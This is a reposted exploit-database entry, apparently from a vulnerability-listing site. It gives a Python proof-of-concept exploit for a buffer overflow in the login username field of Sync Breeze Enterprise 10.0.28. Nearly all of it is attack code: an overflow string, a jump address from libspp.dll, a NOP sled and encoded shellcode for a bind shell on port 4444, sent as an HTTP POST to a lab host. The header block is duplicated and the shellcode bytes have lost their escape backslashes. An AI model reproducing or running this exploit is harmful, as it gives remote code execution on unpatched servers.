Sync Breeze Enterprise 10.0.28 Buffer Overflow

Details
Category: Vulnerabilities
Hits: 3578
# Exploit Title: [SyncBreeze POST username overflow]
# Date: [30-Sep-2017]
# Exploit Author: [Owais Mehtab]
# Vendor Homepage: [http://www.syncbreeze.com] # Exploit Title: [SyncBreeze POST username overflow]
# Date: [30-Sep-2017]
# Exploit Author: [Owais Mehtab]
# Vendor Homepage: [http://www.syncbreeze.com]
# Software Link: [http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe]
# Version: [10.0.28]
# Tested on: [Windows 7]

#!/usr/bin/python
import socket
import os
import sys

crash = "A" * 1000
# jmp = 10 09 0c 83 libspp.dll
# bad char = 00 0A 0D 25 26 2B 3D

bind shell on port 4444
buf = ""
buf += "xb8x3bxccxbexaaxdbxd2xd9x74x24xf4x5bx33"
buf += "xc9xb1x53x31x43x12x83xc3x04x03x78xc2x5c"
buf += "x5fx82x32x22xa0x7axc3x43x28x9fxf2x43x4e"
buf += "xd4xa5x73x04xb8x49xffx48x28xd9x8dx44x5f"
buf += "x6ax3bxb3x6ex6bx10x87xf1xefx6bxd4xd1xce"
buf += "xa3x29x10x16xd9xc0x40xcfx95x77x74x64xe3"
buf += "x4bxffx36xe5xcbx1cx8ex04xfdxb3x84x5exdd"
buf += "x32x48xebx54x2cx8dxd6x2fxc7x65xacxb1x01"
buf += "xb4x4dx1dx6cx78xbcx5fxa9xbfx5fx2axc3xc3"
buf += "xe2x2dx10xb9x38xbbx82x19xcax1bx6ex9bx1f"
buf += "xfdxe5x97xd4x89xa1xbbxebx5exdaxc0x60x61"
buf += "x0cx41x32x46x88x09xe0xe7x89xf7x47x17xc9"
buf += "x57x37xbdx82x7ax2cxccxc9x12x81xfdxf1xe2"
buf += "x8dx76x82xd0x12x2dx0cx59xdaxebxcbx9exf1"
buf += "x4cx43x61xfaxacx4axa6xaexfcxe4x0fxcfx96"
buf += "xf4xb0x1ax02xfcx17xf5x31x01xe7xa5xf5xa9"
buf += "x80xafxf9x96xb1xcfxd3xbfx5ax32xdcxaexc6"
buf += "xbbx3axbaxe6xedx95x52xc5xc9x2dxc5x36x38"
buf += "x06x61x7ex2ax91x8ex7fx78xb5x18xf4x6fx01"
buf += "x39x0bxbax21x2ex9cx30xa0x1dx3cx44xe9xf5"
buf += "xddxd7x76x05xabxcbx20x52xfcx3ax39x36x10"
buf += "x64x93x24xe9xf0xdcxecx36xc1xe3xedxbbx7d"
buf += "xc0xfdx05x7dx4cxa9xd9x28x1ax07x9cx82xec"
buf += "xf1x76x78xa7x95x0fxb2x78xe3x0fx9fx0ex0b"
buf += "xa1x76x57x34x0ex1fx5fx4dx72xbfxa0x84x36"
buf += "xcfxeax84x1fx58xb3x5dx22x05x44x88x61x30"
buf += "xc7x38x1axc7xd7x49x1fx83x5fxa2x6dx9cx35"
buf += "xc4xc2x9dx1f"


crash = "A" * 780 + "x83x0cx09x10" + "x90"*16 + buf

fuzz="username="+crash+"&password=A"

buffer="POST /login HTTP/1.1 "
buffer+="Host: 192.168.211.149 "
buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 "
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "
buffer+="Accept-Language: en-US,en;q=0.5 "
buffer+="Referer: http://192.168.211.149/login "
buffer+="Connection: close "
buffer+="Content-Type: application/x-www-form-urlencoded "
buffer+="Content-Length: "+str(len(fuzz))+" "
buffer+=" "
buffer+=fuzz

expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.211.149", 80))
expl.send(buffer)
expl.close()